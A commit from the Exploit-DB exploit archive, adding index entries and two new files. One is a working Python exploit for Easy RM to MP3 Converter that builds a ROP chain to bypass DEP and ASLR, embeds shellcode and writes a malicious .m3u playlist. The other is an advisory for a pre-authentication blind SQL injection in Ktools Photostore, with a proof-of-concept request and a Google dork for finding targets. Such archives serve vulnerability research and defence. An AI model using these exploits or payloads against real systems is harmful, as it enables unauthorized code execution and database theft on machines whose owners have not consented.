DB: 2016-07-01
2 new exploits phpBookingCalendar <= 1.0c - (details_view.php) Remote SQL Injection TFT Gallery <= 0.10 - Password Disclosure Remote Exploit phpBookingCalendar 1.0c - (details_view.php) SQL Injection TFT Gallery 0.10 - Password Disclosure Remote Exploit Seattle Lab Mail 5.5 - POP3 Buffer Overflow Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow Ktools Photostore 4.7.5 - Blind SQL Injection Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass
This commit is contained in:
Offensive Security
parent
f74a7dfb7e
commit
0fddce018e
3 changed files with 242 additions and 3 deletions
|
|
@ -1349,8 +1349,8 @@ id,file,description,date,author,platform,type,port
|
|||
1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit",2006-03-23,ATmaCA,windows,remote,0
|
||||
1608,platforms/php/webapps/1608.php,"WebAlbum <= 2.02pl - COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0
|
||||
1609,platforms/php/webapps/1609.pl,"PHP Ticket <= 0.71 (search.php) Remote SQL Injection Exploit",2006-03-25,undefined1_,php,webapps,0
|
||||
1610,platforms/php/webapps/1610.txt,"phpBookingCalendar <= 1.0c - (details_view.php) Remote SQL Injection",2006-03-25,undefined1_,php,webapps,0
|
||||
1611,platforms/php/webapps/1611.pl,"TFT Gallery <= 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0
|
||||
1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - (details_view.php) SQL Injection",2006-03-25,undefined1_,php,webapps,0
|
||||
1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0
|
||||
1612,platforms/php/webapps/1612.php,"CuteNews <= 1.4.1 (function.php) Local File Include Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0
|
||||
1613,platforms/windows/dos/1613.c,"Vavoom <= 1.19.1 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0
|
||||
1614,platforms/windows/dos/1614.c,"csDoom <= 0.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0
|
||||
|
|
@ -14196,7 +14196,7 @@ id,file,description,date,author,platform,type,port
|
|||
16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,metasploit,windows,remote,0
|
||||
16397,platforms/windows/remote/16397.rb,"Lyris ListManager MSDE Weak sa Password",2010-09-20,metasploit,windows,remote,0
|
||||
16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server Hello Overflow",2010-04-30,metasploit,windows,remote,0
|
||||
16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0
|
||||
16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0
|
||||
16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve Message Engine Heap Overflow",2010-04-30,metasploit,windows,remote,0
|
||||
16402,platforms/windows/remote/16402.rb,"CA BrightStor HSM Buffer Overflow",2010-05-09,metasploit,windows,remote,0
|
||||
|
|
@ -35864,6 +35864,7 @@ id,file,description,date,author,platform,type,port
|
|||
39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0
|
||||
39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0
|
||||
39654,platforms/windows/dos/39654.pl,"Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0
|
||||
40046,platforms/php/webapps/40046.txt,"Ktools Photostore 4.7.5 - Blind SQL Injection",2016-06-30,"Gal Goldshtein and Viktor Minin",php,webapps,80
|
||||
39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0
|
||||
39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
|
||||
39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0
|
||||
|
|
@ -36121,6 +36122,7 @@ id,file,description,date,author,platform,type,port
|
|||
39930,platforms/osx/dos/39930.c,"OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0
|
||||
39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Stored XSS",2016-06-13,"Hamit Abis",php,webapps,80
|
||||
39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - CSRF Shell Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
|
||||
39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass",2016-06-13,"Fitzl Csaba",windows,local,0
|
||||
39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
|
||||
39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
|
||||
39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
45
platforms/php/webapps/40046.txt
Executable file
45
platforms/php/webapps/40046.txt
Executable file
|
|
@ -0,0 +1,45 @@
|
|||
Title : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
|
||||
CVE-ID : CVE-2016-4337
|
||||
Google Dork: inurl:mgr.login.php
|
||||
Product : Photostore
|
||||
Affected : Versions prior to 4.7.5
|
||||
Impact : Critical
|
||||
Remote : Yes
|
||||
Website link: http://www.ktools.net
|
||||
Reported : 02/06/2016
|
||||
Authors : Gal Goldshtein and Viktor Minin
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||||
No authentication (login) is required to exploit this vulnerability.
|
||||
The Photostore application password recovery module is prone to a blind sql injection attack.
|
||||
An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.
|
||||
|
||||
|
||||
Vulnerable code is located in the mgr.login.php file:
|
||||
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||||
case 'recover_login': {
|
||||
mysqli_query( $db, '' . 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' );
|
||||
$result = ;
|
||||
mysqli_num_rows( $result );
|
||||
$returned_rows = ;
|
||||
mysqli_fetch_array( $result );
|
||||
$db_admin_user = ;
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||||
|
||||
PoC:
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||||
POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
|
||||
Host: victim.net
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
|
||||
Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 9
|
||||
|
||||
email=%27%20[SQL PAYLOAD];#
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
||||
|
||||
192
platforms/windows/local/39933.py
Executable file
192
platforms/windows/local/39933.py
Executable file
|
|
@ -0,0 +1,192 @@
|
|||
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
|
||||
# Date: 2016-06-12
|
||||
# Exploit Author: Csaba Fitzl
|
||||
# Vendor Homepage: N/A
|
||||
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
|
||||
# Version: 2.7.3.700
|
||||
# Tested on: Windows 7 x64
|
||||
# CVE : CVE-2009-1330
|
||||
|
||||
import struct
|
||||
|
||||
def create_rop_chain():
|
||||
|
||||
# rop chain generated with mona.py - www.corelan.be
|
||||
# added missing parts, and some optimisation by Csaba Fitzl
|
||||
rop_gadgets = [
|
||||
|
||||
#mov 1000 to EDX - Csaba
|
||||
0x41414141, # Filler (compensate)
|
||||
0x41414141, # Filler (compensate)
|
||||
0x41414141, # Filler (compensate)
|
||||
0x10025a1c, # XOR EDX,EDX # RETN
|
||||
0x1002bc3d, # MOV EAX,411 # RETN
|
||||
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1002dc24, # ADD EAX,80 # POP EBP # RETN
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1002dc41, # ADD EAX,40 # POP EBP # RETN
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1001d2ac, # ADD EAX,4 # RETN
|
||||
0x1001d2ac, # ADD EAX,4 # RETN
|
||||
0x1001d2ac, # ADD EAX,4 # RETN
|
||||
0x1001d2ac, # ADD EAX,4 # RETN
|
||||
0x1001d2ac, # ADD EAX,4 # RETN
|
||||
0x1001d2ac, # ADD EAX,4 # RETN
|
||||
0x1001d2ac, # ADD EAX,4 # RETN
|
||||
0x1001d2ac, # ADD EAX,4 # RETN
|
||||
0x1001d2ac, # ADD EAX,4 # RETN
|
||||
0x1001d2ac, # ADD EAX,4 # RETN
|
||||
0x1001d2ac, # ADD EAX,4 # RETN
|
||||
0x10023327, # INC EAX # RETN
|
||||
0x10023327, # INC EAX # RETN
|
||||
0x10023327, # INC EAX # RETN
|
||||
# AT this point EAX = 0x1000
|
||||
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
|
||||
0x41414141, # Filler (compensate)
|
||||
0x41414141, # Filler (compensate)
|
||||
0x41414141, # Filler (compensate)
|
||||
0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
|
||||
0x41414141, # Filler (compensate)
|
||||
|
||||
|
||||
0x10026d56, # POP EAX # RETN [MSRMfilter03.dll]
|
||||
0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
|
||||
0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
|
||||
|
||||
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
|
||||
0x41414141, # Filler (compensate)
|
||||
0x41414141, # Filler (compensate)
|
||||
0x41414141, # Filler (compensate)
|
||||
0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll]
|
||||
0x1001b058, # & push esp # ret [MSRMfilter03.dll]
|
||||
0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll]
|
||||
0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx)
|
||||
0x1001d2ac, # ADD EAX,4 # RETN
|
||||
0x10023327, # INC EAX # RETN
|
||||
0x10023327, # INC EAX # RETN
|
||||
0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll]
|
||||
0x41414141, # Filler (compensate)
|
||||
0x41414141, # Filler (compensate)
|
||||
|
||||
0x10029f74, # POP ECX # RETN [MSRMfilter03.dll]
|
||||
0xffffffff, #
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
|
||||
0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll]
|
||||
0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll]
|
||||
0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll]
|
||||
0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
|
||||
0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL
|
||||
|
||||
]
|
||||
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
|
||||
|
||||
buffersize = 26090
|
||||
|
||||
junk = "A" * buffersize
|
||||
|
||||
eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} : # ADD ESP,8 # RETN
|
||||
|
||||
rop = create_rop_chain()
|
||||
|
||||
calc = (
|
||||
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
|
||||
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
|
||||
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
|
||||
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
|
||||
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
|
||||
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
|
||||
|
||||
|
||||
shell = "\x90"*0x10 + calc
|
||||
|
||||
exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))
|
||||
|
||||
filename = "list.m3u"
|
||||
textfile = open(filename , 'w')
|
||||
textfile.write(exploit)
|
||||
textfile.close()
|
||||
Loading…
Add table
Reference in a new issue